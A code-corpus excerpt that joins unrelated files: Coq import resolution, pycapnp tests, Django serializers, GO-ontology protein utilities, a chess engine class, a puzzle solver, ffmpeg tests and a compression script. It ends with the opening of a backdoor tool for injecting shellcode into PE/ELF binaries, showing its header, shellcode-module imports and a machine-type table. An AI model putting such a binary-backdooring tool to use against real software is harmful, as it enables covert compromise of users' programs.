if os.path.isfile(filename):
return lib_of_filename(filename, **kwargs)
else:
return lib
def merge_imports(imports, **kwargs):
kwargs = fill_kwargs(kwargs)
rtn = []
for import_list in imports:
for i in import_list:
if norm_libname(i, **kwargs) not in rtn:
rtn.append(norm_libname(i, **kwargs))
return rtn
# This is a bottleneck for more than around 10,000 lines of code total with many imports (around 100)
@memoize
def internal_recursively_get_imports(lib, **kwargs):
return run_recursively_get_imports(lib, recur=internal_recursively_get_imports, **kwargs)
def recursively_get_imports(lib, **kwargs):
return internal_recursively_get_imports(lib, **safe_kwargs(kwargs))
def run_recursively_get_imports(lib, recur=recursively_get_imports, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if os.path.isfile(v_name):
imports = get_imports(lib, fast=fast, **kwargs)
if kwargs['inline_coqlib'] and 'Coq.Init.Prelude' not in imports:
mykwargs = dict(kwargs)
coqlib_libname = (os.path.join(kwargs['inline_coqlib'], 'theories'), 'Coq')
if coqlib_libname not in mykwargs['libnames']:
mykwargs['libnames'] = tuple(list(kwargs['libnames']) + [coqlib_libname])
try:
coqlib_imports = get_imports('Coq.Init.Prelude', fast=fast, **mykwargs)
if imports and not any(i in imports for i in coqlib_imports):
imports = tuple(list(coqlib_imports) + list(imports))
except IOError as e:
kwargs['log']("WARNING: --inline-coqlib passed, but no Coq.Init.Prelude found on disk.\n Searched in %s\n (Error was: %s)\n\n" % (repr(mykwargs['libnames']), repr(e)))
if not fast: make_globs(imports, **kwargs)
imports_list = [recur(k, fast=fast, **kwargs) for k in imports]
return merge_imports(tuple(map(tuple, imports_list + [[lib]])), **kwargs)
return [lib]
| mit | 1,641,937,864,110,081,000 | 49.052632 | 404 | 0.625096 | false | 3.401693 | false | false | false |
jparyani/pycapnp | test/test_load.py | 1 | 2708 | import pytest
import capnp
import os
import sys
this_dir = os.path.dirname(__file__)
@pytest.fixture
def addressbook():
return capnp.load(os.path.join(this_dir, 'addressbook.capnp'))
@pytest.fixture
def foo():
return capnp.load(os.path.join(this_dir, 'foo.capnp'))
@pytest.fixture
def bar():
return capnp.load(os.path.join(this_dir, 'bar.capnp'))
def test_basic_load():
capnp.load(os.path.join(this_dir, 'addressbook.capnp'))
def test_constants(addressbook):
assert addressbook.qux == 123
def test_classes(addressbook):
assert addressbook.AddressBook
assert addressbook.Person
def test_import(foo, bar):
m = capnp._MallocMessageBuilder()
foo = m.init_root(foo.Foo)
m2 = capnp._MallocMessageBuilder()
bar = m2.init_root(bar.Bar)
foo.name = 'foo'
bar.foo = foo
assert bar.foo.name == 'foo'
def test_failed_import():
s = capnp.SchemaParser()
s2 = capnp.SchemaParser()
foo = s.load(os.path.join(this_dir, 'foo.capnp'))
bar = s2.load(os.path.join(this_dir, 'bar.capnp'))
m = capnp._MallocMessageBuilder()
foo = m.init_root(foo.Foo)
m2 = capnp._MallocMessageBuilder()
bar = m2.init_root(bar.Bar)
foo.name = 'foo'
with pytest.raises(Exception):
bar.foo = foo
def test_defualt_import_hook():
# Make sure any previous imports of addressbook_capnp are gone
capnp.cleanup_global_schema_parser()
import addressbook_capnp # noqa: F401
def test_dash_import():
import addressbook_with_dashes_capnp # noqa: F401
def test_spaces_import():
import addressbook_with_spaces_capnp # noqa: F401
def test_add_import_hook():
capnp.add_import_hook([this_dir])
# Make sure any previous imports of addressbook_capnp are gone
capnp.cleanup_global_schema_parser()
import addressbook_capnp
addressbook_capnp.AddressBook.new_message()
def test_multiple_add_import_hook():
capnp.add_import_hook()
capnp.add_import_hook()
capnp.add_import_hook([this_dir])
# Make sure any previous imports of addressbook_capnp are gone
capnp.cleanup_global_schema_parser()
import addressbook_capnp
addressbook_capnp.AddressBook.new_message()
def test_remove_import_hook():
capnp.add_import_hook([this_dir])
capnp.remove_import_hook()
if 'addressbook_capnp' in sys.modules:
# hack to deal with it being imported already
del sys.modules['addressbook_capnp']
with pytest.raises(ImportError):
import addressbook_capnp # noqa: F401
def test_bundled_import_hook():
# stream.capnp should be bundled, or provided by the system capnproto
capnp.add_import_hook()
import stream_capnp # noqa: F401
| bsd-2-clause | -2,962,946,150,982,487,000 | 21.756303 | 73 | 0.684638 | false | 3.167251 | true | false | false |
RUBi-ZA/JMS | src/users/serializers.py | 2 | 2766 | from rest_framework import serializers
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from users.models import *
class CountrySerializer(serializers.ModelSerializer):
class Meta:
model = Country
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','email','first_name','id','last_login','last_name','username')
class GroupUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('id','username')
class GroupSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
class Meta:
model = Group
fields = ('id', 'name', 'user_set')
class UserProfileSerializer(serializers.ModelSerializer):
user = UserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class UserProfileNameSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = UserProfile
fields = ('user',)
class ContactUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','first_name','id','last_name','username')
class ContactProfileSerializer(serializers.ModelSerializer):
user = ContactUserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class ContactSerializer(serializers.ModelSerializer):
ContactProfile = ContactProfileSerializer()
class Meta:
model = Contact
class MessageSerializer(serializers.ModelSerializer):
UserProfile = UserProfileNameSerializer()
class Meta:
model = Message
fields = ('MessageID', 'Content', 'Date', 'UserProfile')
class UserConversationSerializer(serializers.ModelSerializer):
UserProfile = UserProfileSerializer()
class Meta:
model = UserConversation
class FullConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
Messages = MessageSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations', 'Messages')
class ConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations')
class GroupConversationSerializer(serializers.ModelSerializer):
Conversation = FullConversationSerializer()
class Meta:
model = GroupConversation
fields = ('Conversation',)
class GroupDetailSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
groupconversation = GroupConversationSerializer()
class Meta:
model = Group
fields = ('id', 'name', 'user_set', 'groupconversation')
| gpl-2.0 | -2,556,878,542,363,221,000 | 26.386139 | 88 | 0.770065 | false | 3.884831 | false | false | false |
yotamfr/prot2vec | src/python/dingo_utils.py | 1 | 19157 | import torch
import os
import sys
import itertools
import threading
from concurrent.futures import ThreadPoolExecutor
from src.python.preprocess2 import *
from blast import *
from tempfile import gettempdir
tmp_dir = gettempdir()
out_dir = "./Data"
from scipy.stats import *
import pickle
NUM_CPU = 8
eps = 10e-6
E = ThreadPoolExecutor(NUM_CPU)
np.random.seed(101)
tmp_dir = gettempdir()
EVAL = 10e6
verbose = False
def save_object(obj, filename):
with open(filename, 'wb') as output:
try:
pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)
except RecursionError:
sys.setrecursionlimit(2 * sys.getrecursionlimit())
save_object(obj, filename)
def load_object(pth):
with open(pth, 'rb') as f:
loaded_dist_mat = pickle.load(f)
assert len(loaded_dist_mat) > 0
return loaded_dist_mat
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
def load_nature_repr_set(db):
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
repr_pth, all_pth = '%s/sp.nr.70' % out_dir, '%s/sp.fasta' % out_dir
fasta_fname = '%s/sp.nr.70' % out_dir
if not os.path.exists(repr_pth):
query = {"db": "sp"}
num_seq = db.uniprot.count(query)
src_seq = db.uniprot.find(query)
sp_seqs = UniprotCollectionLoader(src_seq, num_seq).load()
to_fasta(sp_seqs, all_pth)
os.system("cdhit/cd-hit -i %s -o %s -c 0.7 -n 5" % (all_pth, repr_pth))
num_seq = count_lines(fasta_fname, sep=bytes('>', 'utf8'))
fasta_src = parse_fasta(open(fasta_fname, 'r'), 'fasta')
seq_map = FastaFileLoader(fasta_src, num_seq).load()
all_seqs = [Seq(uid, str(seq)) for uid, seq in seq_map.items()]
return all_seqs
def get_distribution(dataset):
assert len(dataset) >= 3
return Distribution(dataset)
class Distribution(object):
def __init__(self, dataset):
self.pdf = gaussian_kde([d * 10 for d in dataset])
def __call__(self, *args, **kwargs):
assert len(args) == 1
# return self.pdf.integrate_box_1d(np.min(self.pdf.dataset), args[0])
return self.pdf(args[0])[0]
class Histogram(object):
def __init__(self, dataset):
self.bins = {(a, a + 1): .01 for a in range(10)}
for p in dataset:
a = min(int(p * 10), 9)
self.bins[(a, a + 1)] += 0.9 / len(dataset)
def __call__(self, *args, **kwargs):
v = int(args[0] * 10)
return self.bins[(v, v + 1)]
class NaiveBayes(object):
def __init__(self, dist_pos, dist_neg):
self.dist_pos = dist_pos
self.dist_neg = dist_neg
def infer(self, val, prior):
dist_pos = self.dist_pos
dist_neg = self.dist_neg
return np.log(prior) + np.log(dist_pos(val)) - np.log(dist_neg(val))
class ThreadSafeDict(dict) :
def __init__(self, * p_arg, ** n_arg) :
dict.__init__(self, * p_arg, ** n_arg)
self._lock = threading.Lock()
def __enter__(self) :
self._lock.acquire()
return self
def __exit__(self, type, value, traceback) :
self._lock.release()
class Seq(object):
def __init__(self, uid, seq, aa20=True):
if aa20:
self.seq = seq.replace('U', 'C').replace('O', 'K')\
.replace('X', np.random.choice(amino_acids))\
.replace('B', np.random.choice(['N', 'D']))\
.replace('Z', np.random.choice(['E', 'Q']))
else:
self.seq = seq
self.uid = uid
self.msa = None
self.f = dict()
def __hash__(self):
return hash(self.uid)
def __repr__(self):
return "Seq(%s, %s)" % (self.uid, self.seq)
def __eq__(self, other):
if isinstance(other, Seq):
return self.uid == other.uid
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __len__(self):
return len(self.seq)
class Node(object):
def __init__(self, go, sequences, fathers, children):
self.go = go
self.sequences = sequences
self.fathers = fathers
self.children = children
self._f_dist_out = None
self._f_dist_in = None
self._plus = None
self._ancestors = None
self._descendants = None
self.seq2vec = {}
self.dataset = [] # for K-S tests
def __iter__(self):
for seq in self.sequences:
yield seq
def __repr__(self):
return "Node(%s, %d)" % (self.go, self.size)
def __hash__(self):
return hash(self.go)
def __eq__(self, other):
if isinstance(other, Node):
return self.go == other.go
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def is_leaf(self):
return len(self.children) == 0
def is_root(self):
return len(self.fathers) == 0
@property
def cousins(self):
ret = set()
for father in self.fathers:
ret |= set(father.children)
return ret - {self}
@property
def ancestors(self):
if not self._ancestors:
self._ancestors = get_ancestors(self)
return self._ancestors
@property
def descendants(self):
if not self._descendants:
self._descendants = get_descendants(self)
return self._descendants
@property
def plus(self):
if not self._plus:
union = sequences_of(self.children)
assert len(union) <= self.size
self._plus = list(self.sequences - union)
return self._plus
@property
def size(self):
return len(self.sequences)
@property
def f_dist_out(self):
if self._f_dist_out:
return self._f_dist_out
else:
raise(KeyError("f_dist_out not computed for %s" % self))
@property
def f_dist_in(self):
if self._f_dist_in:
return self._f_dist_in
else:
raise(KeyError("f_dist_in not computed for %s" % self))
def sample(self, m):
n = min(self.size, m)
sequences = self.sequences
s = set(np.random.choice(sequences, n, replace=False))
assert len(s) == n > 0
return s
def get_ancestors(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for father in curr.fathers:
if father in visited or father.is_root():
continue
visited.add(father)
Q.append(father)
return visited
def get_descendants(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for child in curr.children:
if child in visited:
continue
visited.add(child)
Q.append(child)
return visited
def sequences_of(nodes):
return reduce(lambda s1, s2: s1 | s2,
map(lambda node: node.sequences, nodes), set())
def compute_node_prior(node, graph, grace=0.0):
node.prior = grace + (1 - grace) * node.size / len(graph.sequences)
class Graph(object):
def __init__(self, onto, uid2seq, go2ids, grace=0.5):
self._nodes = nodes = {}
self.sequences = sequences = set()
# self.onto = onto
nodes[onto.root] = self.root = Node(onto.root, set(), [], [])
for go, ids in go2ids.items():
seqs = set([Seq(uid, uid2seq[uid]) for uid in ids])
nodes[go] = Node(go, seqs, [], [])
sequences |= seqs
for go, obj in onto._graph._node.items():
if 'is_a' not in obj:
assert go == onto.root
continue
if go not in go2ids:
assert go not in nodes
continue
if go not in nodes:
assert go not in go2ids
continue
for father in obj['is_a']:
nodes[go].fathers.append(nodes[father])
nodes[father].children.append(nodes[go])
for node in nodes.values():
if node.is_leaf():
assert node.size > 0
continue
children = node.children
for child in children:
assert child.size > 0
node.sequences |= child.sequences
for node in nodes.values():
compute_node_prior(node, self, grace)
def prune(self, gte):
to_be_deleted = []
for go, node in self._nodes.items():
if node.size >= gte:
continue
for father in node.fathers:
father.children.remove(node)
for child in node.children:
child.fathers.remove(node)
to_be_deleted.append(node)
for node in to_be_deleted:
del self._nodes[node.go]
return to_be_deleted
def __len__(self):
return len(self._nodes)
def __iter__(self):
for node in self._nodes.values():
yield node
def __getitem__(self, go):
return self._nodes[go]
def __contains__(self, go):
return go in self._nodes
@property
def leaves(self):
return [node for node in self if node.is_leaf()]
@property
def nodes(self):
return list(self._nodes.values())
def sample(self, max_add_to_sample=10):
def sample_recursive(node, sampled):
if not node.is_leaf():
for child in node.children:
sampled |= sample_recursive(child, sampled)
plus = node.plus
s = min(max_add_to_sample, len(plus))
if s > 0:
sampled |= set(np.random.choice(plus, s, replace=False))
return sampled
return sample_recursive(self.root, set())
def sample_pairs(nodes, include_node, sample_size=10000):
pairs = set()
pbar = tqdm(range(len(nodes)), desc="nodes sampled")
for node in nodes:
pbar.update(1)
s_in = min(200, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
if include_node:
pairs |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
else:
pairs |= set((seq1, seq2) for seq1, seq2 in itertools.combinations(sample_in, 2))
pbar.close()
n = len(pairs)
pairs_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(pairs))[pairs_indices, :]
def sample_pairs_iou(graph, sample_size=10000):
data = set()
leaf_pairs = list(itertools.combinations(list(graph.leaves), 2))
n = len(leaf_pairs)
indices = np.random.choice(list(range(n)), sample_size, replace=False)
pbar = tqdm(range(len(indices)), desc="nodes sampled")
for leaf1, leaf2 in np.asarray(leaf_pairs)[indices, :]:
intersection = leaf1.ancestors & leaf2.ancestors
union = leaf1.ancestors | leaf2.ancestors
iou = len(intersection) / len(union)
iou = 2 * iou - 1 # scale to [-1, 1]
sequences1 = list(leaf1.sequences - leaf2.sequences)
sequences2 = list(leaf2.sequences - leaf1.sequences)
s1 = min(len(sequences1), 100)
sample1 = np.random.choice(list(sequences1), s1, replace=False) if sequences1 else []
s2 = min(len(sequences2), 100)
sample2 = np.random.choice(list(sequences2), s2, replace=False) if sequences2 else []
data |= set((seq1, seq2, leaf1, 1) for seq1, seq2 in itertools.combinations(sample1, 2))
data |= set((seq1, seq2, leaf2, 1) for seq1, seq2 in itertools.combinations(sample2, 2))
data |= set((seq1, seq2, leaf1, iou) for seq1 in sample1 for seq2 in sample2)
data |= set((seq2, seq1, leaf2, iou) for seq2 in sample2 for seq1 in sample1)
pbar.update(1)
pbar.close()
n = len(data)
indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(data))[indices, :]
def sample_pos_neg_no_common_ancestors(graph, sample_size=10000):
pos, neg = set(), set()
root_children = set(graph.root.children)
seq2nodes = {}
for node in graph:
for seq in node.sequences:
if seq in seq2nodes:
seq2nodes[seq].add(node)
else:
seq2nodes[seq] = {node}
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
list_in = list(node.sequences)
s_in = min(100, len(list_in))
sample_in = np.random.choice(list_in, s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
non_ancestors = root_children - node.ancestors
if not non_ancestors:
continue
distant = np.random.choice(list(non_ancestors))
for child in distant.descendants:
if not child.is_leaf():
continue
list_out = list(filter(lambda s: node not in seq2nodes[s], child.sequences))
if not list_out:
continue
s_out = min(100, len(list_out))
sample_out = np.random.choice(list_out, s_out, replace=False)
neg |= set((seq1, seq2, distant) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def sample_pos_neg(graph, sample_size=10000):
pos, neg = set(), set()
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
s_in = min(100, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
for cousin in node.cousins:
cousin_sequences = cousin.sequences - node.sequences
if not cousin_sequences:
continue
s_out = min(100, len(cousin_sequences))
sample_out = np.random.choice(list(cousin_sequences), s_out, replace=False)
neg |= set((seq1, seq2, cousin) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def run_metric_on_triplets(metric, triplets, verbose=True):
data = []
n = len(triplets)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq1, seq2, node) in enumerate(triplets):
data.append(metric(seq1, seq2, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def run_metric_on_pairs(metric, pairs, verbose=True):
data = []
n = len(pairs)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq, node) in enumerate(pairs):
data.append(metric(seq, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def l2_norm(seq, node):
vec = node.seq2vec[seq]
return np.linalg.norm(vec)
def cosine_similarity(seq1, seq2, node):
vec1 = node.seq2vec[seq1]
vec2 = node.seq2vec[seq2]
ret = fast_cosine_similarity(vec1, [vec2])
return ret[0]
def fast_cosine_similarity(vector, vectors, scale_zero_one=False):
vectors = np.asarray(vectors)
dotted = vectors.dot(vector)
matrix_norms = np.linalg.norm(vectors, axis=1)
vector_norm = np.linalg.norm(vector)
matrix_vector_norms = np.multiply(matrix_norms, vector_norm)
neighbors = np.divide(dotted, matrix_vector_norms).ravel()
if scale_zero_one:
return (neighbors + 1) / 2
else:
return neighbors
def kolmogorov_smirnov_cosine(pos, neg, metric):
data1 = run_metric_on_triplets(metric, pos)
data2 = run_metric_on_triplets(metric, neg)
save_object(data1, "Data/dingo_%s_ks_cosine_pos_data" % asp)
save_object(data2, "Data/dingo_%s_ks_cosine_neg_data" % asp)
return ks_2samp(data1, data2)
def kolmogorov_smirnov_norm(pos, neg, metric):
data1 = run_metric_on_pairs(metric, pos)
data2 = run_metric_on_pairs(metric, neg)
save_object(data1, "Data/dingo_%s_ks_norm_pos_data" % asp)
save_object(data2, "Data/dingo_%s_ks_norm_neg_data" % asp)
return ks_2samp(data1, data2)
if __name__ == "__main__":
cleanup()
from pymongo import MongoClient
client = MongoClient('mongodb://localhost:27017/')
db = client['prot2vec']
asp = 'F' # molecular function
onto = get_ontology(asp)
t0 = datetime.datetime(2014, 1, 1, 0, 0)
t1 = datetime.datetime(2014, 9, 1, 0, 0)
# t0 = datetime.datetime(2017, 1, 1, 0, 0)
# t1 = datetime.datetime.utcnow()
print("Indexing Data...")
trn_stream, tst_stream = get_training_and_validation_streams(db, t0, t1, asp)
print("Loading Training Data...")
uid2seq_trn, _, go2ids_trn = trn_stream.to_dictionaries(propagate=True)
print("Loading Validation Data...")
uid2seq_tst, _, go2ids_tst = tst_stream.to_dictionaries(propagate=True)
print("Building Graph...")
graph = Graph(onto, uid2seq_trn, go2ids_trn)
print("Graph contains %d nodes" % len(graph))
print("Load DigoNet")
go_embedding_weights = np.asarray([onto.todense(go) for go in onto.classes])
net = AttnDecoder(ATTN, 100, 10, go_embedding_weights)
net = net.cuda()
# ckpth = "/tmp/digo_0.01438.tar"
ckpth = "/tmp/digo_0.15157.tar"
print("=> loading checkpoint '%s'" % ckpth)
checkpoint = torch.load(ckpth, map_location=lambda storage, loc: storage)
net.load_state_dict(checkpoint['net'])
print("Running K-S tests...")
pos, neg = sample_pos_neg(graph)
data_pos, data_neg = [], []
for (p_s1, p_s2, p_n), (n_s1, n_s2, n_n) in zip(pos, neg):
data_pos.append((p_s1, p_n))
data_pos.append((p_s2, p_n))
data_neg.append((n_s1, n_n))
data_neg.append((n_s2, n_n))
compute_vectors(data_pos, net, onto)
compute_vectors(data_neg, net, onto)
res = kolmogorov_smirnov_norm(data_pos, data_neg, l2_norm)
print("K-S l2_norm: %s, %s" % res)
res = kolmogorov_smirnov_cosine(pos, neg, cosine_similarity)
print("K-S cosine: %s, %s" % res)
| mit | -2,146,032,486,321,290,800 | 30.200326 | 99 | 0.577909 | false | 3.347955 | false | false | false |
erget/KingSnake | king_snake/player.py | 1 | 3615 | """A chess player."""
from king_snake.errors import (FieldMustBeCastledError,
FieldOccupiedError,
IllegalMoveError,
PawnMustCaptureError,
TurnError)
from king_snake.figures import Pawn, Rook, Knight, Bishop, Queen, King
class Player(object):
"""A chess player."""
def __repr__(self):
return "Player()"
def __str__(self):
if self.chessboard:
return_string = ("{color} Player on "
"{chessboard}\n"
"Figures: "
"{figures}".format(color=self.color,
chessboard=self.chessboard,
figures=self.figures))
else:
return_string = self.__repr__()
return return_string
def __init__(self):
self.chessboard = None
self.figures = None
self.king = None
self.color = None
@property
def opponent(self):
"""Return other player in chess game"""
if self.color == "white":
return self.chessboard.players["black"]
else:
return self.chessboard.players["white"]
def set_up_board(self, chessboard):
"""Set up pieces on given chessboard and find other player."""
self.chessboard = chessboard
if self == self.chessboard.players["white"]:
self.color = "white"
else:
self.color = "black"
self.figures = list(Pawn(self) for pawns in range(8))
for doubled_piece in (Rook, Knight, Bishop) * 2:
self.figures.append(doubled_piece(self))
self.figures.append(Queen(self))
self.king = King(self)
self.figures.append(self.king)
def move(self, start, goal):
"""
Move a piece to a new field.
First verify if self is the chessboard's current player. Then check if
a moveable figure is located at the start field. If the piece can be
moved, move to the goal field, capturing a figure at the goal field if
necessary. Finally, check if the move would put the own king in check.
If yes, roll back the move. Otherwise, record the current turn on all
moved pieces and end the turn.
@param start_field - String used to look up field object (e.g. "E2")
@param goal_field - Like start_field
"""
if self != self.chessboard.current_player:
raise TurnError("Move attempted out of turn.")
start_field = self.chessboard.fields[start]
goal_field = self.chessboard.fields[goal]
figure = start_field.figure
if not figure in self.figures:
raise IllegalMoveError("Player does not own a piece at given "
"position.")
try:
figure.move(goal_field)
captured_piece = None
except (FieldOccupiedError, PawnMustCaptureError):
captured_piece = figure.capture(goal_field)
except FieldMustBeCastledError:
captured_piece = figure.castle(goal_field)
if self.king.in_check:
self.chessboard.rollback()
raise IllegalMoveError("Move would put player's king in check.")
figure.already_moved = True
figure.last_moved = self.chessboard.current_move
if captured_piece:
captured_piece.last_moved = self.chessboard.current_move
self.chessboard.end_turn(start, goal)
| gpl-3.0 | -8,314,341,011,309,242,000 | 35.515152 | 78 | 0.561549 | false | 4.164747 | false | false | false |
madfist/aoc2016 | aoc2016/day20/main.py | 1 | 1033 | import sys
import re
def prepare(data):
ranges = []
for d in data.split('\n'):
m = re.match(r'(\d+)-(\d+)', d)
ranges.append([int(m.group(1)), int(m.group(2))])
return sorted(ranges, key=lambda r:r[0])
def get_lowest(data):
sr = prepare(data)
high = sr[0][1]
for i in range(1,len(sr)):
if sr[i][0] > high+1:
return high+1
high = max(high, sr[i][1])
def count_all(data):
sr = prepare(data)
high = sr[0][1]
count = 0
for i in range(1,len(sr)):
if high+1 < sr[i][0]:
count += sr[i][0] - high - 1
high = max(sr[i][1], high)
if high < 4294967295:
count += 4294967295 - high
return count
def main():
if (len(sys.argv) < 2):
print("Usage: python3", sys.argv[0], "<data>")
exit(1)
with open(sys.argv[1], 'r') as input:
data = input.read()
print("Lowest available:", get_lowest(data))
print("Available addresses:", count_all(data))
if __name__ == '__main__':
main() | mit | 201,707,456,742,472,450 | 24.219512 | 57 | 0.518877 | false | 2.994203 | false | false | false |
melon-boy/odroid-webserver | pkg/ffmpeg_pywrapper/ffmpeg_pywrapper/tests/test.py | 1 | 2414 | #!/usr/bin/python
from unittest import TestCase, main
from ffmpeg_pywrapper.ffprobe import FFProbe
import pkg_resources
class TestFFProbe(TestCase):
'''
Unit test for FFProbe output
'''
VIDEO_FILE = pkg_resources.resource_filename('ffmpeg_pywrapper', 'res/test.mp4')
def test_print_formats(self):
ff = FFProbe(self.VIDEO_FILE)
filename = str(ff.get_format_filename())
self.assertTrue(filename)
duration = str(ff.get_format_duration())
self.assertTrue(duration)
format_name = str(ff.get_format_format_name())
self.assertTrue(format_name)
start_time = str(ff.get_format_start_time())
self.assertTrue(start_time)
size = str(ff.get_format_size())
self.assertTrue(size)
bit_rate = str(ff.get_format_bit_rate())
self.assertTrue(bit_rate)
print('-------------------------------------------------')
print('- Test 1: video file formats -')
print('-------------------------------------------------')
print('File name: ' + str(filename))
print('Duration (seconds): ' + str(duration))
print('Format: ' + str(format_name))
print('Start time (seconds): ' + str(start_time))
print('File Size (Kb): ' + str(size))
print('Bit rate (Kb/s): ' + str(bit_rate))
print('-------------------------------------------------')
print('- End of Test 1. -')
print('-------------------------------------------------')
print('-------------------------------------------------')
print('- Test 2: ffprobe command line execution -')
print('-------------------------------------------------')
def test_command_line_execution(self):
ff = FFProbe(self.VIDEO_FILE)
options = '-v error -show_entries format'
print('Arguments : ' + str(options))
res = ff.command_line_execution(options)
print('Output: ' + str(res))
print('-------------------------------------------------')
print('- End of Test 2. -')
print('-------------------------------------------------')
if __name__ == '__main__':
main()
| mit | -4,393,099,233,897,129,500 | 32.527778 | 84 | 0.423364 | false | 4.770751 | true | false | false |
lmjohns3/cube-experiment | analysis/11-compress-jacobians.py | 1 | 2143 | import climate
import glob
import gzip
import io
import lmj.cubes
import logging
import numpy as np
import os
import pandas as pd
import pickle
import theanets
def compress(source, k, activation, **kwargs):
fns = sorted(glob.glob(os.path.join(source, '*', '*_jac.csv.gz')))
logging.info('%s: found %d jacobians', source, len(fns))
# the clipping operation affects about 2% of jacobian values.
dfs = [np.clip(pd.read_csv(fn, index_col='time').dropna(), -10, 10)
for fn in fns]
B, N = 128, dfs[0].shape[1]
logging.info('loaded %s rows of %d-D data from %d files',
sum(len(df) for df in dfs), N, len(dfs))
def batch():
batch = np.zeros((B, N), 'f')
for b in range(B):
a = np.random.randint(len(dfs))
batch[b] = dfs[a].iloc[np.random.randint(len(dfs[a])), :]
return [batch]
pca = theanets.Autoencoder([N, (k, activation), (N, 'tied')])
pca.train(batch, **kwargs)
key = '{}_k{}'.format(activation, k)
if 'hidden_l1' in kwargs:
key += '_s{hidden_l1:.4f}'.format(**kwargs)
for df, fn in zip(dfs, fns):
df = pd.DataFrame(pca.encode(df.values.astype('f')), index=df.index)
s = io.StringIO()
df.to_csv(s, index_label='time')
out = fn.replace('_jac', '_jac_' + key)
with gzip.open(out, 'wb') as handle:
handle.write(s.getvalue().encode('utf-8'))
logging.info('%s: saved %s', out, df.shape)
out = os.path.join(source, 'pca_{}.pkl'.format(key))
pickle.dump(pca, open(out, 'wb'))
@climate.annotate(
root='load data files from subject directories in this path',
k=('compress to this many dimensions', 'option', None, int),
activation=('use this activation function', 'option'),
)
def main(root, k=1000, activation='relu'):
for subject in lmj.cubes.Experiment(root).subjects:
compress(subject.root, k, activation,
momentum=0.9,
hidden_l1=0.01,
weight_l1=0.01,
monitors={'hid1:out': (0.01, 0.1, 1, 10)})
if __name__ == '__main__':
climate.call(main)
| mit | 1,167,373,156,157,772,800 | 30.057971 | 76 | 0.580495 | false | 3.188988 | false | false | false |
codercold/Veil-Evasion | tools/backdoor/pebin.py | 1 | 54056 | '''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import sys
import os
import struct
import shutil
import platform
import stat
import time
import subprocess
import pefile
from random import choice
from intel.intelCore import intelCore
from intel.intelmodules import eat_code_caves
from intel.WinIntelPE32 import winI32_shellcode
from intel.WinIntelPE64 import winI64_shellcode
MachineTypes = {'0x0': 'AnyMachineType',
'0x1d3': 'Matsushita AM33',
'0x8664': 'x64',
'0x1c0': 'ARM LE',
'0x1c4': 'ARMv7',
'0xaa64': 'ARMv8 x64',
'0xebc': 'EFIByteCode',
'0x14c': 'Intel x86',
